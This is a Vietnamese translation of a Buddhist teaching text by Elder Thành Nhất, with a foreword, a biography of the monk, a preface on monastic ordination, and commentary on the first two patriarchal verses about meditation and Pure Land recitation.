Trưởng lão Thành Nhất giảng
Thích Đinh Viên dịch.
LỜI ĐẦU
Sau khi tác phẩm “Hạnh người cư sĩ” ra đời, người dịch nghĩ ngay đến việc dịch một tác phẩm nói về hạnh người xuất gia. Lúc duyệt độc văn bản Hán, người dịch vô tình tìm được tác phẩm: “Tổ sư huấn hối xuất gia tam thập yếu tắc” do Thành Nhất Trưởng lão giảng. Nội dung tập sách giảng rộng ba mươi bài kệ của Tổ sư dạy bảo người xuất gia, mỗi bài kệ nêu lên một hạnh chính yếu. Như bắt gặp của báu, người dịch chuyển ngữ một cách say mê với nhiều tâm đắc và đã mạo muội đặt lại tên “Hạnh người xuất gia” cho ngắn gọn dễ hiểu.
“Hạnh người xuất gia” hiến tặng độc giả hữu duyên với bao kỳ vọng:
Người đọc là bậc tôn trưởng thì tập sách này như là lời xác chứng, khẳng định đường hướng giáo dục đệ tử.
Người đọc là tăng ni sinh trẻ thì tập sách như là tấm gương soi rọi lại chính mình; là cẩm nang không thể thiếu trên hành trình li trần thoát tục; là định thủy châu để lắng trong tâm ý; là bài thuốc quí trị bệnh phàm phu; là thuyền từ đưa hành giả xuôi về nẻo giác.
Người đọc là cư sĩ thì tập sách này như là những chuẩn mực giúp thiện nam tín nữ y nương để hoàn thành sứ mạng hộ pháp cao cả có ý nghĩa nhất.
Với bao kì vọng như thế, nguyện xin “Hạnh người xuất gia” là giọt nước nhỏ góp phần vào biển cả Phật pháp, ngõ hầu báo đáp bốn ơn nặng trong muôn một.
Quá trình chuyển ngữ dù nhiệt huyết có dư nhưng văn chương thô thiển, chắc chắn còn nhiều vụng về sai sót, xin các bậc thiện tri thức cảm lòng thành mà hoan hỉ chỉ chính.
NAM-MÔ HOAN HỶ TẠNG BỒ TÁT MA-HA-TÁT
An Động, những ngày cuối Đông Canh Dần
Cẩn bút
Thích Định Viên
Vài nét về THÀNH NHẤT LÃO SƯ
“Một người xuất gia chân chính cần phải kiên trinh ý chí, cống hiến thân tâm cho Phật pháp, luôn luôn nghiên cứu giáo nghĩa, tuyên dương Phật pháp để mong hóa độ nhân thế, chẳng nên khởi niệm vị kỷ, lợi danh tính toán”.
Xuất gia gần năm mươi năm, hiện tại Pháp sư Thành Nhất làm chủ tịch Hoa Nghiêm Xã ở Đài Bắc Thị, Ngài luôn luôn tuân thủ nguyên tắc như thế và không ngừng khích lệ hàng xuất gia hậu học cùng với số đông tín đồ thực hiện tinh thần ấy. Hiện nay ngài đã gần bảy mươi tuổi.
Ngài người huyện Giang Tô, năm 15 tuổi xuất gia với pháp sư Xuân Viễn ở chùa Quan Âm cùng huyện. Bắt đầu đời sống xuất gia, so với những vị khác ngài trải qua rất nhiều hoàn cảnh, nhưng dù trường hợp nào ngài cũng luôn tuân thủ giới luật của người xuất gia và có nhiều cống hiến cho Phật Giáo, cứu giúp cũng như hóa độ rất nhiều người.
Xuất thân từ Phật Học Viện Quang Hiếu, năm Dân Quốc thứ 31 (1943), ngài học Y học Cổ Truyền ở Thượng Hải. Sau khi tốt nghiệp, ngài bắt tay vào công tác dùng Y phương minh cứu giúp mọi người. Đầu tiên ở chùa Ngọc Phật, Thượng Hải, ngài thành lập cơ sở điều trị miễn phí của Phật giáo, trong đó có bốn khoa: khoa nội, khoa ngoại, khoa phụ nữ và khoa tiểu nhi; trị bệnh và phát thuốc miễn phí.
Ngài suốt đời giúp người mà không bao giờ tự khoe y thuật cao minh. Thực tế, từ khi ngài hành nghề y cho đến nay, thật có thể dùng bốn chữ “cứu người vô số” để hình dung. Ngài thừa nhận có nghiên cứu chút ít về bệnh nội khoa, song với sự nhìn nhận của mọi người thì Ngài có trình độ y học rất cao thâm, không những biết nội khoa mà còn biết cả thủ thuật ngoại khoa. Thủ thuật này giới y sư cũng rất hiếm người biết đến. Do gần đây, ngoại khoa của Tây y phát triển nên ngài không dùng đến thủ thuật này.
Hiện nay, ngài ở Hoa Nghiêm Liên Xã, số 440, đoạn 2, Đường Tế Nam, Đài Bắc Thị. Ngài tuy đã già nhưng người đến xin chữa bệnh vẫn không dứt. Vì để phục vụ cho bệnh nhân, ngài còn có giao ước đặc biệt với những hiệu thuốc gần đó, nếu gặp người bần cùng đến xin trị bệnh có thể lấy thuốc miễn phí. Sau đó, đến kì Hoa Nghiêm Xã sẽ tính tiền.
Tuổi trẻ đi học ở Thượng Hải, pháp sư Thành Nhất còn có 3 năm làm ký giả để sinh sống. Nhận lời mời của báo Thanh Niên ở Giang Tô, ngài đảm nhận các tin tức về tôn giáo, tuy nhiên chỉ là mang tính cách kiêm nhiệm nhưng đó cũng là phương tiện để ngài hoằng truyền Phật pháp. Ở đó, ngài đã có không ít cống hiến và cũng nhân đó ngài kết giao không ít bạn bè giới báo chí.
Năm Dân Quốc thứ 37, Ngài đến Đài Loan giúp nghiệp sư là cư sĩ Trương Thiếu Trai mở Học Thế Đồ Thư Xã, lưu thông kinh Phật, nhờ đó mà Đài Loan bắt đầu có tài liệu nghiên cứu Phật Học.
Dân Quốc thứ 41 (1953) theo Pháp sư Nam Đình sáng lập Hoa Nghiêm Liên Xã, cho đến nay đã 32 năm. Trong khoảng thời gian đó, ngài ra nhận chức Hội Trưởng hội Niệm Phật, Chủ tịch chi hội Phật giáo huyện Nghi Lan, Ban Điều Hành phân hội tỉnh Đài Loan, Quản lí giám sát chi nhánh Đài Bắc.
Năm Dân Quốc thứ 57 (1969), Ngài dự Hiệp Hội thế giới Phật giáo phục vụ xã hội và Đại Hội Phật giáo thế giới tổ chức tại Tây Cống.
Năm Dân Quốc 60 (1972), ngài được cử làm trưởng đoàn Hội Phật Giáo Trung quốc ở Đông Nam Á.
Năm Dân Quốc 62 (1974), Ngài làm trưởng đoàn Hội thanh niên Phật giáo thế giới đi dự đại hội tổ chức ở Hàn Quốc.
Năm Dân Quốc 67 (1979), Ngài đã dẫn phái đoàn hoàn thành cuộc giao lưu văn hóa với hai trường đại học nhà nước ở tiểu bang Florida, với các hoạt động như tiếp xúc với Thống Đốc và bộ trưởng, tặng Đại tạng kinh cho mỗi trường, đồng thời diễn giảng Phật pháp.
Năm Dân Quốc 69-70 (1981-1982), ngài đi Nhật Bản, Hàn Quốc tham dự hội nghị học thuật Phật giáo.
Từ khi trụ trì Hoa Nghiêm Xã đến nay, công việc của ngài càng thêm bận rộn. Ngài vẫn kiên giữ hoài bảo của người xuất gia, cho đến chẳng chút tư dục. Sức làm việc của ngài thì người bình thường khó theo kịp: suốt ngày ngài bận rộn từ sáng đến tối, ngoài thời gian tham thiền, lễ Phật, thời gian còn lại ngài dành trọn cho công tác giáo dục Phật giáo. Trước sau, ngài vẫn cho rằng: ‘Hiện tại Phật giáo nước ta còn có nhiều việc cần phải làm’.
Ngoài ra, ngài còn không quên nghiên cứu y học cổ truyền với nguyện vọng giúp đỡ cho nhiều người. Hiện nay pháp sư Thành Nhất đảm nhiệm các chức vụ:
– Hội trưởng kiêm trụ trì Hoa Nghiêm Xã ở Đài Bắc Thị.
– Viện trưởng học viện Hoa Nghiêm Chuyên tông.
– Ban điều hành hội Phật giáo Trung Quốc.
– Chủ tịch trường dạy nghề công thương cao cấp Trí Quang
– Ban điều hành hội hữu nghị Trung Quốc tôn giáo đồ.
– Đạo sư giảng đường Phật giáo Kiều Ái ở Điều Viên .
– Chủ tịch học hội Thực vật dược dụng.
– Phụ trách tạp chí Tân Trung dược.
Đương nhiên những việc đó có liên quan đến sự cứu nhân độ thế, ngài thường nói đó là trách nhiệm cần có.
Năm Dân Quốc thứ 69 (1981), giới Trung y dược tổ chức đại học Trung Quốc Y Dược Học Thuật Thế Giới tại Đài Bắc, ngài lại phải gánh vách trách nhiệm chủ tịch đoàn chủ tịch.
Ngoài ra ngài còn vận dụng các cơ hội để giải đáp Phật học cho mọi người. Các đài phát thanh và đài truyền hình trong nước, mỗi khi gặp các vấn đề về Phật giáo thường thỉnh ngài làm chủ tọa buổi giải đáp.
Điều đặc biệt đáng nói, Học viện Hoa Nghiêm Chuyên Tông ở Hoa Nghiêm Liên xã, là tổ chức Phật giáo đầu tiên thực hiện chế độ giáo dục đại học. Một học sinh trải qua 4 năm đào luyện, phải hoàn thành 130 đến 150 học phần mới có thể tốt nghiệp.
Học viện Hoa Nghiêm Chuyên Tông do pháp sư Thành Nhất khai sáng tháng 10 năm Dân Quốc 64 (1976), với tông chỉ “Hoằng dương Hoa Nghiêm đại giáo, bồi dưỡng hoằng pháp nhân tài, đoan chính Phật học tư tưởng, kiến thiết nhân gian tịnh độ” (truyền bá rộng rãi giáo nghĩa vĩ đại của kinh Hoa Nghiêm, bồi dưỡng nhân tài để hoằng dương Phật pháp, đồng thời cải chính tư tưởng Phật học và thiết lập tịnh độ ở nhân gian).
Trường thâu nhận thanh niên nữ có động cơ học Phật chân chính, không có thói quen xấu, thân thể kiện toàn, đã tốt nghiệp đại học hay trung cấp phổ thông hoặc trung cấp Phật học, đã xuất gia hoặc chuẩn bị xuất gia. Giáo trình tu học toàn khóa gồm: kinh Hoa Nghiêm, Ngũ giáo nghi, Duy thức học, Nhân Minh học, Quốc phụ tư tưởng, Trung Quốc triết học, Ấn Độ triết học, Trung ngoại lịch sử, Quốc văn, Anh văn, Nhật văn, Phật giáo sử, Nhiếp đại thừa luận, Đại thừa khởi tín luận, Hoa Nghiêm giáo nghĩa chương, Mỹ thuật…. Đối với những người có thành tích xuất sắc và có chí muốn nghiên cứu sâu, sẽ được nhà trường gửi đi du học.
Học viện Hoa Nghiêm Chuyên Tông mỗi kì chiêu sinh 20 vị chính thức và 10 vị dự khóa. Hiện nay vào mùa Hạ, học viện còn thâu nhận 10 đến 50 vị nghiên cứu sinh. Trong quá trình học tập mọi chi phí như ăn ở, sách vở… đều do học viện cung cấp, người có thành tích xuất sắc thì được nhận học bỗng. Ban giáo thọ là những vị pháp sư uyên thâm Phật học và những giáo sư thuộc các trường đại học.
Pháp sư Thành Nhất còn có một công việc rất trọng yếu là nghiên cứu về cây thuốc ở Trung Quốc, bởi ngài là chủ tịch Học hội Trung quốc dược dụng thực vật. Thành viên của hội này hơn 1700 người ở khắp Đài Loan, và đã thành lập các chi nhánh ở các huyện thị như Cao Hùng, Đài Bắc, Điều Viên, Tân Trúc… Họ còn đem cây thuốc ở Đài Loan trồng thử nghiệm ở chỗ khác rồi đem về chế thành mẫu nghiên cứu dạng tấm hay dạng dịch cung cấp cho các nhà nghiên cứu Trung y dược.
Pháp sư Thành Nhất luôn tuân thủ nếp sinh hoạt của người xuất gia. Mỗi ngày 4 giờ 30 sáng ngài thức dậy lễ Phật, ngồi thiền; 8 giờ 30 đến dạy ở học viện Hoa Nghiêm Chuyên Tông, sau đó xử lí các công việc thuộc xã hội và học viện. Tối sau giờ ăn, ngài lại tụng kinh ngồi thiền. Vào các tối thứ hai, tư, sáu, từ 7 giờ đến 8 giờ 30, ngài giảng kinh Hoa Nghiêm. Hằng ngày đến 11 giờ đêm ngài mới đi ngủ. Như thế, ngày này qua ngày khác, sự biến động rất ít.
Thân thể ngài khỏe mạnh, bí quyết dưỡng sinh của ngài rất đơn giản, chỉ cần tâm không phiền não, bữa ăn đúng thời, đúng lượng mà thôi.
Ngài bằng lòng với Phật giáo Trung Quốc hiện nay, ngài cho rằng các tạp chí Phật giáo xuất bản trong hiện tại đã có hơn 20 loại, Phật học viện cũng có mười mấy trường, các địa phương tổ chức giảng kinh cũng tăng dần, tự viện và người xuất gia ngày càng tăng. Đặc biệt theo sự kêu gọi của chính phủ, Phật giáo tích cực làm công tác từ thiện xã hội như thiết lập cô nhi viện, dưỡng lão viện, Phật giáo y viện, cho đến phát động cứu tế người nghèo trong những tháng đông. Đó là minh chứng Phật giáo ngày càng phát triển.
Pháp sư Thành Nhất là một vị trưởng lão Phật giáo miệt mài với công việc. Ngài cho rằng việc cần làm thì làm, nói làm là làm. Vào năm Dân Quốc 68 (1980), từ một vùng đất trống, ngài đã kiến lập hơn 500 phòng cho thôn nhi đồng Kiều Ái Hoa Nghiêm. Đồng thời xây dựng Giảng đường Phật giáo Kiều Ái, đến tháng 6 năm Dân Quốc 70 (1982) thì hoàn thành và bắt đầu xây dựng cô nhi viện. Hiện tại nuôi dưỡng hơn 30 em. Lúc tin tức vừa truyền đi thì ngài nhận được lời ca ngợi của nhân sĩ khắp các nơi. Họ cho rằng yếu tố quan trọng để phát triển Phật giáo trước hết phải bắt đầu từ việc giáo dục Phật giáo. Thời nay có rất nhiều người làm quản lí giáo dục Phật giáo nhưng rất ít thấy ai tiến hành đúng theo phương thức chính qui, chỉ có dạng tương tự như các lớp dạy kèm được thể chế hóa. Một khi qui định năm học tập và học phần thích ứng thì mới có thể khiến cho giáo dục Phật giáo ở nước ta dựng lập một tiêu chuẩn tốt trên thế giới.
Pháp sư Thành Nhất tán thành việc hội Phật giáo Trung quốc thành lập một trung tâm giải đáp vấn đề Phật giáo để có thể thanh trừ những hiểu lầm của ngoại giới đối với Phật giáo, đồng thời còn có thể chủ động đẩy mạnh công tác truyền bá Phật giáo. Ngài kêu gọi tất cả các Phật tử phải nghiên cứu nhiều về giáo pháp, để không chỉ làm lợi ích cho chính mình mà còn giải đáp nghi vấn cho người khác. Đặc biệt phải nghe giảng kinh nhiều, tham dự nhiều pháp hội, đọc nhiều tạp chí Phật giáo và sau đó có thể phát biểu những tâm đắc của mình. Mọi người trao đổi những điều tâm đắc về Phật pháp với nhau, như thế mới có thể khiến cho văn hóa Phật giáo ngày càng phát triển.
HẠNH NGƯỜI XUẤT GIA
(Tổ Sư huấn hối xuất gia tam thập yếu tắc)
LỜI TỰA
Hai chữ ‘xuất gia’ mọi người đều biết, là chỉ cho sự lìa xa gia đình của mình, đi vào chùa làm tu sĩ tu học Phật pháp. Từ xuất gia bắt nguồn từ Ấn Độ, âm Hán dịch là Ba-phệ-nễ-dã (Āraṇyaka), dịch ý là bỏ lối sinh hoạt của thế tục, tu tập hạnh thanh tịnh của sa-môn.
Xuất gia cần phải đầy đủ bao nhiêu điều kiện?
- Phải được sự cho phép của cha mẹ. Cha mẹ không cho thì không được xuất gia. Kinh Duy-ma-cật, phẩm Đệ tử nói: “Tôi nghe lời Phật dạy: cha mẹ không cho không được xuất gia”.
- Phải phát tâm bồ-đề mới có thể xuất gia. Tâm bồ-đề là tâm giác ngộ thánh đạo, nếu không phát tâm bồ-đề thì tu tập không có mục đích, vì thế không được xuất gia. Phẩm Phương tiện trong kinh Duy-ma ghi: “Duy-ma-cật nói: ‘Các ông phải phát tâm A-nậu-đa-la Tam-miệu-tam-bồ-đề, đó tức là xuất gia’”. Ý của câu này là đã phát tâm bồ-đề tức là xuất gia, không nhất định phải đầy đủ hình thức. Hoặc nói: “Tu học Phật đạo đâu nhất định phải xuất gia?”.
Thích thị yếu lãm dẫn luận Tỳ-bà-sa: “Nhà thế tục là nhân duyên của phiền não, người xuất gia vì diệt trần cấu hệ lụy nên phải xa rời nhà thế tục”. Xuất gia thệ nguyện phải kiên cố mới có thể thành tựu.
Kinh Phổ Diệu ghi: “Thích-ca Như Lai ban đầu muốn xuất gia mà phát bốn lời nguyện:
- Nguyện cứu vớt những chúng sinh bị tai ách khốn cùng.
- Nguyện dứt trừ hoặc chướng cho chúng sinh.
- Nguyện dứt trừ tà kiến cho chúng sinh.
- Nguyện độ khổ đau cho chúng sinh”.
Sự xuất gia của Phật-đà đầy đủ tâm đại bi không gì so sánh, chẳng phải vì cầu lợi ích về mình.
Công đức xuất gia như thế nào?
Kinh Công đức xuất gia ghi: “Phật nghe âm nhạc của Tì-la-tiễn-na biết ông bảy ngày nữa sẽ mạng chung nên bảo tôn giả A-nan khuyên vua xuất gia một đêm một ngày. Sau khi vua mạng chung, bảy lần sinh lên cõi trời Lục Dục[1], Hai mươi đời không đọa vào đường ác, tinh tấn tu tập Phật pháp, nay đã đắc quả Bích-chi Phật”.
Tì-la-tiễn-na là em chú bác với đức Thế Tôn, thương Tì-la-tiễn-na bị đọa lạc nên Phật mới bảo tôn giả A-nan đến khuyên vua xuất gia một ngày một đêm. Trong nghi thức xuất gia, trước tiên phải tâm bồ-đề, qui y Tam bảo, sau đó mới thụ trì giới pháp thanh tịnh, nương pháp tu hành. Thời gian một ngày một đêm tuy rất ngắn, nhưng một niệm chí thành, công đức ấy đủ để diệt tội tăng phúc, thành tựu thiện căn, trong hai mươi kiếp không đọa đường ác. Nhân vì vua đã thụ tam qui, trì giới cụ túc, sâu trồng gốc lành xuất thế, nên đời sau sinh lên cõi trời, thường gặp thiện duyên mà tu tập tô bồi phúc tuệ, đạo nghiệp ngày càng tăng tiến, phiền não dần tiêu trừ, xa rời nhân duyên thế tục, bước lên giai vị bậc thánh. Vì thế không những không đọa đường ác mà còn chứng quả Bích-chi Phật. Nếu lại hồi Tiểu hướng Đại, phát tâm Bồ-đề, tu đạo xuất thế thì quả Phật đại giác nhất định sẽ thành tựu.
Từ đó mà xét lời thiền sư Kính Sơn: “Xuất gia là việc của bậc đại trượng phu, chẳng phải là nơi thể hiện hình tướng”. Nói như thế là có luận lí và căn cứ.
Căn cứ vào kinh Phật và lời dạy của Tổ, công đức xuất gia thật bất khả tư nghì, nhưng phải làm thế nào để thành tựu đại công đức: “Liễu sinh thoát tử, chuyển phàm thành thánh”. Chúng ta đã phát tâm xuất gia, thì chí nguyện phải kiên định, phải phát tâm bồ-đề. Đọc kinh để tăng trưởng trí tuệ, trì giới để thanh tịnh ba nghiệp, lễ Phật để sám hối nghiệp chướng, tĩnh tọa để đình chỉ vọng tâm, niệm Phật để cầu tăng phúc đức, bớt phan duyên việc thế tục, tích cực hoằng truyền chính pháp. Tất cả mọi việc đều nương pháp mà tu hành, bỏ tâm tham cầu danh lợi, thường ôm lòng hổ thẹn, luôn nghĩ đến việc báo đáp bốn ân. Nếu có thể làm được mấy điểm như thế, thì công đức xuất gia nhất định thành tựu.
Nếu những lời tôi nói ra còn nông cạn thì chúng ta hãy xem lại cổ nhân nói như thế nào? Trong Vân Thê sùng hạnh Lục, Đại sư Liên Trì ghi:
Xuất gia không khó, giữ hạnh khó
Tín nguyện chẳng lập hóa trống không
Tịnh giới không giữ thành phí sức
Chẳng gặp minh sư chỉ nhọc công.
Tu hành còn dễ gặp thầy khó
Tu mù luyện càn chỉ bằng không
Tự cho thông minh thêm nhọc sức
Chẳng thành đạo quả, lại luống công.
Học đạo không khó, ngộ đạo khó
Chẳng chịu công phu thì bằng không
Chỉ tin chẳng hành thành phí sức
Không không luận thuyết lại luống công.
Ba bài kệ ấy đã đưa ra và xác định việc xuất gia, tu hành, học đạo. Hành giả có thể tham khảo, mới biết lời tôi nói chẳng phải hư vọng.
Thời mạt pháp, Phật pháp suy vi, ma đạo hùng mạnh, tìm một người chân thật tu hành, lòng giữ chính niệm, không cầu hư danh thật là chẳng dễ. Vì thế, tôi năm bảy mươi bốn tuổi, việc tạp tạm rảnh, trong lúc quá đường cùng với đại chúng, tôi đã chọn chương “Tổ sư huấn hối xuất gia tam thập tắc” thuộc phần phụ văn trong hai thời khóa tụng để làm đề tài nói chuyện. Hy vọng dùng kinh nghiệm xuất gia của cổ đức làm khuôn phép tu học cho đại chúng.
Tôi bắt đầu giảng từ ngày mồng ba tháng mười đến ngày mười chín tháng tư thì giảng xong. Có vị lãnh hội một cách trọn vẹn nên đã ghi lại, gia tâm chỉnh sửa rồi đăng trên tạp chí Vạn Hạnh và đã được độc giả phản ánh khá tốt.
Đến năm tôi bảy mươi tám tuổi, nhân đáp ứng yêu cầu ở các nơi, lại nhờ cư sĩ Cao Minh Đạo phát tâm chỉnh lí, xuất bản. Các tự viện, học viện gửi thư xin thỉnh rất nhiều và chẳng chờ đợi lâu, ấn phẩm được gửi tặng.
Nay pháp sư Hiền Độ ban ấn hành của Tùng thư Vạn Hạnh xin tôi tái bản lưu hành và thỉnh tôi viết lời tựa để giới thiệu.
Tôi cảm thấy hiện tại Phật giáo Đài Loan phát triển hơn trước đây, sách Phật giáo được xuất bản rất nhiều và đẹp nhưng chỉ trọng về sự phát huy lí luận, rất ít sách đề cập đến sự tu hành thiết thực.
Vì mọi người cho rằng tác phẩm này còn có giá trị tái bản, có thể xuất bản để kết duyên. Nhân đó, tôi đưa ra một vài lời dạy của Phật Tổ, viết đầu sách nhằm làm tăng thêm sự tín tâm cho người đọc, tạm gọi là lời tựa.
- Hạnh tham thiền.
Hiện nay, tôi đã đem trách nhiệm trụ trì giao cho người khác nên có thể chẳng cần tham gia tạp sự đối đãi của thế tục, vì thế có thời gian để ăn cơm quá đường cùng đại chúng, thuyết giảng Phật pháp. Các vị tổ sư xưa thường vì những việc tu học trọng yếu trong sinh hoạt hằng ngày của người xuất gia chúng ta mà đưa ra ba mươi điều. Mỗi điều là một bài kệ, hi vọng tì-kheo tân học chú ý nghiên cứu. Nếu thường nương vào đó thực hành, tiến tu đạo nghiệp thì nhất định sẽ có phần lợi ích. Vì thế tôi muốn đem đề tài này cùng nghiên cứu thảo luận với đại chúng.
Đây là bài kệ thứ nhất:
Chữ Hán
出家要真參禪
參透未生以前
一日凡軀脫落
靈光普蔭人天
Phiên âm:
Xuất gia yếu chân tham thiền
Tham thấu vị sinh dĩ tiền
Nhất nhật phàm khu thoát lạc
Linh quang phổ ấm nhân thiên.
Dịch nghĩa
Xuất gia chân thật tham thiền
Tham đến vị sinh dĩ tiền
Ngày kia thân tâm rỗng lặng
Linh quang phủ khắp nhân thiên.
Thời xưa, các chùa Phật giáo đa phần theo thiền tông, vì thế Tổ sư trong cửa thiền khai thị điều quan trọng thứ nhất đối với người học chính là tham thiền. Hằng ngày chúng ta tọa thiền sau thời công phu sáng cũng chính là luyện tập tham thiền. Kì thật pháp tham thiền không chỉ giới hạn ở tư thế ngồi mới gọi là tham thiền mà khi tiếp cảnh đều là thiền cơ. Vì thế nói: “Đi cũng thiền, ngồi cũng thiền, nói nín, động tịnh thể an nhiên”. Tham thiền cần phải công phu chân thật, không nên chỉ giả dạng bề ngoài. Chân thật tham thiền thì từng giây từng phút không rời đề mục. Thời xưa, có học giả hỏi Tổ sư:
– Thế nào là Tây lai ý[2]? Đó cũng chính là hỏi: Thế nào là thiền?
Tổ sư đáp :
-Tĩnh tâm quán sát ý.
Nghĩa là người có thể tĩnh tâm quán sát thiền ý mới gọi là chân tham thiền.
Thế nào gọi là “Tham đến vị sinh dĩ tiền”? Đó là một phương pháp tham thiền rất thiết thực của Tổ sư xưa. Tham cái gì? Tâm không chấp trước vào một nơi nào, chẳng phải người tham ngồi xuống thì có thể trừ được vọng tưởng mà Tổ sư hướng dẫn chúng ta tham: “Trước khi cha mẹ chưa sinh ta là gì?”. Thoại đầu ấy là mấu chốt dẫn phát thiền cơ, dùng nó làm công cụ đưa đến đạt ngộ. Nhưng biện pháp ấy không đưa ra đáp án cụ thể, chỉ có thể nắm chặt câu thoại đầu ấy mà tham: ‘Trước khi cha mẹ sinh ra, ta là gì?..?…?’. Tham đến một ngày nào đó “thân tâm thoát lạc” thì đó chính là thời khắc ngộ đạo.
Thoát lạc là một ví dụ dùng hình ảnh thùng đựng nước. Hiện tại thùng đều bằng nhựa, ngày xưa thùng bằng gỗ, dưới đáy ghép một tấm gỗ, nhờ tấm gỗ đáy, mới có thể đựng nước. Tác dụng của tấm gỗ đáy chính là ngăn không cho nước chảy ra ngoài. Rầm! Một ngày kia tấm gỗ đáy rơi xuống, nước trong thùng tuôn ra ngoài. Thiền môn lấy đó ví cho người khai ngộ, gọi là ‘rơi đáy thùng’.
Thân tâm thoát lạc tức là ngã chấp rơi rụng, ta cùng vạn vật hòa thành một thể, cho đến vạn vật cùng ta đều không tồn tại, chỉ có một phiến trong sáng rỗng lặng. Đáy thùng rơi biểu thị cho sự thông suốt, sự đạt ngộ, sự tỏ rõ, lúc ấy ánh sáng thể tính phát chiếu. Người thành tựu như thế mới đủ tư cách lên tòa báu lớn thuyết pháp độ người, gọi là ‘Linh quang phủ khắp trời người’.
- Hạnh niệm Phật
Chữ Hán:
出家要勤念佛
念念要生彼國
念到不念而念
彌陀不從他得。
Phiên âm:
Xuất gia yếu cần niệm Phật
Niệm niệm yếu sinh bỉ quốc
Niệm đáo bất niệm nhi niệm
Di-đà bất tùng tha đắc.
Dịch nghĩa:
Xuất gia phải chuyên niệm Phật
Niệm quyết sinh về nước kia
Niệm đến không niệm mà niệm
Di-đà chẳng từ bên ngoài.
Các bậc thiền sư tu hành nương vào tự lực; thiền là phương pháp thẳng tắt đốn ngộ. Người hành pháp thiền để đạt đến trạng thái khai ngộ, vì thế từ khi Phật giáo du nhập, Phật giáo đồ Trung Quốc đã chú trọng tu thiền. Sau khi Tổ sư Đạt Ma đến, ngài đặc biệt xiển dương Thiền tông, và cho đến Lục tổ Huệ Năng về sau gần như thiền tông ảnh hưởng đến toàn bộ Phật giáo Trung Quốc.
Phương pháp tu hành của Thiền tông rất đơn giản, nhưng nếu người chẳng thể hội thì sự đạt ngộ chậm trể một đời. Vì thế hạnh thứ nhất nói cần phải tham đến trước khi cha mẹ chưa sinh, và phải thường tham cho đến lúc ‘phàm khu thoát lạc’ sau đó mới ‘linh quang phổ ấm nhân thiên’ tự lợi và lợi tha. Pháp môn ấy không phải người nào cũng có thể tu hành được, nên vào thời Đông Tấn (317-420), Đại sư Tuệ Viễn[3] đặc biệt đề xướng pháp môn niệm Phật Tịnh độ, ngài tập hợp một trăm hai mươi ba người danh sĩ đương thời như Lưu Di Dân…kết thành làng niệm Phật tại Lô sơn thuộc Giang Tây, lấy vãng sinh Tịnh độ Cực Lạc làm mục đích. Mọi người gọi là ‘Tịnh độ Tông’. Từ đó, ngài chuyên tu pháp môn Tịnh độ niệm Phật, ba mươi năm không xuống núi vì ngại lãng phí thời gian, tán tâm loạn ý.
Ở lớp học tôi từng nói: “Chúng ta học tập cần phải thành tâm luyện tập”. Tu tập pháp môn niệm Phật càng phải tận tâm chuyên cần hành trì. Chúng ta thử nghĩ ba mươi năm không xuống núi là công phu như thế nào? Vì thế, Tổ sư khai thị cho chúng ta điều cần yếu thứ hai của người xuất gia là:
Xuất gia yếu cần niệm Phật
Niệm niệm yếu sinh bỉ quốc
Niệm đáo bất niệm nhi niệm
Di-đà bất tùng tha đắc.
Người xuất gia lấy sự tu hành, liễu sinh tử làm việc chính yếu. Dụng công tốt nhất là tham thiền, thế nên tham thiền được đặt ở điều thứ nhất. Người không thể tham thiền thì niệm Phật, nên niệm Phật đặt ở vị trí thứ hai. Như thế, hoàn toàn chẳng phải phân biệt pháp môn có cao thấp mà là căn cơ chúng sinh có lợi độn. Người căn cơ linh lợi có thể áp dụng pháp thiền, vì tu thiền là con đường tắt. Nếu không thể tham thiền cũng chẳng thành vấn đề bởi chúng ta có pháp niệm Phật, nhưng niệm Phật cũng chẳng phải niệm một cách tùy tiện.
Niệm Phật có ba điều kiện quan trọng:
- Phải có tín tâm.
Đây là pháp môn nương vào tha lực nên cần phải tin tưởng có thế giới Tây phương Cực Lạc. Tin tưởng niệm Phật nhất định sẽ vãng sinh thế giới Cực Lạc. Tin tưởng niệm Phật chí thành thì Tây phương Tam Thánh đến tiếp dẫn chúng ta.
- Phát nguyện tha thiết.
Phải thường nguyện sinh cõi Tịnh độ. Niệm Phật phải chuyên cần không phải chỉ niệm Phật trong khóa lễ còn những lúc khác thì không niệm. Chẳng phải lúc nhớ đến thì niệm, không nhớ đến thì quên niệm Phật, mà phải luôn luôn niệm Phật trong mọi thời mọi khắc mới thành tựu được công phu nhất tâm bất loạn. Đó cũng chính là luôn luôn nguyện sinh về tịnh độ. Thường niệm Phật chính là hi vọng có thể sinh về thế giới Cực Lạc. Mọi điều tốt lành ở thế gian đều không mong cầu, chỉ cầu một điều là sinh về thế giới Cực Lạc. Như vậy gọi là nguyện tha thiết.
- Phải nỗ lực hành trì.
Kinh Lăng-nghiêm nói: “Như con nhớ mẹ”. Thí như con trẻ chưa thể tự lập, một ngày kia bỗng dưng xa mẹ thì liền kêu khóc. Chúng ta niệm Phật cũng giống như con trẻ nhớ mẹ, thời khắc chẳng rời. Kinh Lăng-nghiêm lại ghi: “Thâu nhiếp sáu căn, niệm niệm nối tiếp”. Niệm Phật thì phải đem sáu căn: tai, mắt, mũi, lưỡi, miệng, ý qui về nhất tâm, tai không nghe điều gì khác, mắt không nhìn gì khác, miệng không nói lời khác, tâm không nghĩ lung tung, thân không loạn động, miệng không tham vị, tất cả đều qui về nhất tâm. Vì thế nên nói sáu căn đều thâu nhiếp.
Niệm niệm liên tục, trong tâm chỉ một niệm hiện tiền, không chút loạn tưởng, tồn tại duy nhất một câu danh hiệu Phật. Tâm niệm thanh tịnh trong từng sát na, cứ tiếp tục niệm như thế, niệm đến chỗ không niệm mà niệm, niệm mà không cần tác ý. Như có thể niệm đến tâm không rời Phật, Phật không rời tâm thì cũng chính là có sự thành tựu.
Thế nào là hữu niệm mà niệm? Nghĩa là nhớ tưởng tới Phật mới niệm, hoặc là niệm mà có mục đích. “Không niệm mà niệm” là thời thời khắc khắc đều trụ trong niệm, tâm không rời Phật, Phật không rời tâm. Công phu như thế, chúng ta cần học tập mới có thể thành công.
